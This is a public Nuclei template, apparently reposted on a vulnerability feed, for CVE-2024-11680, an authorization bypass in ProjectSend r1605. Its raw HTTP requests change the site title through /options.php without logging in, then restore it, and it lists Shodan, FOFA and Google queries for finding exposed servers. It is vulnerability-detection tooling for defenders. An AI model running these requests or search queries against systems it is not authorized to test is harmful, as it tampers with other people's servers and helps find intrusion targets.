An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
PoC代码[已公开]
id: CVE-2024-11680
info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: critical
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
- https://vulncheck.com/advisories/projectsend-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11680
cwe-id: CWE-287,CWE-863
epss-score: 0.93609
epss-percentile: 0.99835
cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: projectsend
product: projectsend
shodan-query:
- http.html:"projectsend"
- http.html:"projectsend setup"
- http.html:"provided by projectsend"
fofa-query:
- body="projectsend"
- body="projectsend setup"
- body=provided by projectsend
google-query: intext:provided by projectsend
tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev,vkev
variables:
string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true
- type: regex
name: title
group: 1
regex:
- '<title>Log in » ([0-9a-zA-Z]+)<\/title>'
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{string}}")'
condition: and
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{title}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{title}}")'
condition: and
# digest: 4b0a00483046022100c53d4e24f363b3dabf15720b1dca52192d6ec57a968d151fcbc2cfad3c5d7e5b02210088727ed40af8428cbafc1bb8d245f43ca473022a0da95d3a867231a1f03c0620:922c64590222798bb761d5b6d8e72950